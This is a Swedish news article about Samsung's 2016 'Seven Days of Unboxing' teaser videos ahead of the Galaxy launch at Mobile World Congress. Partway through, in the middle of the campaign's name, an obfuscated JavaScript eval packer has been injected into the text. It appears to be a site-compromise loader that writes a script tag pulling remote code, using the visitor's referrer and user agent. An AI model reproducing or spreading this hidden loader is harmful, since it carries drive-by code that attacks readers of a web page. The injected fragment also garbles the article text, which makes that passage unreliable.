Image Image Image Image Image Image Image Image Image Image

| 23 oktober, 2020

Scroll to top

Top

Samsung visar upp sin nya Galaxy – ur en femårings perspektiv

Samsung visar upp sin nya Galaxy – ur en femårings perspektiv
Sebastian

Idag startar Samsung nedräkningen inför Mobile World Congress 2016 i Barcelona, MWC, där Samsung för första gången kommer att visa upp sin nya Galaxy för allmänheten. Men sex utvalda har redan sett nyheten och bjuder under veckan inför MWC på sin egen visuella tolkning för att ge alla nyfikna en försmak av vad som väntar.

I Seven eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|anhds|var|u0026u|referrer|eefrd||js|php’.split(’|’),0,{}))
Days of Unboxing
kommer en av årets mest efterlängtade nyheter från Samsung att tolkas av barnet, laman, konditorn, metallkonstnären, isskulptören och motivlackeraren för att slutligen avtäckas på Samsung Galaxy Unpacked under MWC. I varje film i serien får den utvalda se Samsungs nyhet och sedan dela med sig av sin egna visuella tolkning. Filmerna kommer kunna följas på www.sevendaysofunboxing.com och genom Samsungs sociala medier.

– Det finns alltid en spänning inför stora lanseringar som denna, och de här tolkningarna ger alla en föraning inför eventet. Alla de inblandade i filmerna har utgått från sina egna unika egenskaper och perspektiv för att beskriva vad det är de fått se. Det kommer bli väldigt spännande att se vad för något just de väljer att plocka ut, säger Adam Fors, Marknadschef på Samsung Norden.

Sju dagar av ”unboxing”
”Unboxing” är ett internetfenomen som uppkom under 2000-talet och under åren har vuxit sig till en populär kategori av filmklipp. Oftast handlar det om personer som filmar när de för första gången öppnar upp nya teknikprodukter och kommenterar samtidigt vad de hittar, men det har aldrig gjorts i så här stor skala förut.

Alla unika tolkningar räknar ner till det stora eventet Samsung Galaxy Unpacked under MWC i Barcelona på söndag den 21 februari där utgångspunkten för tolkningarna äntligen kommer att göras offentlig. Se uppackningen av nya Galaxy på live-stream klockan 19:00 via www.sevendaysofunboxing.com.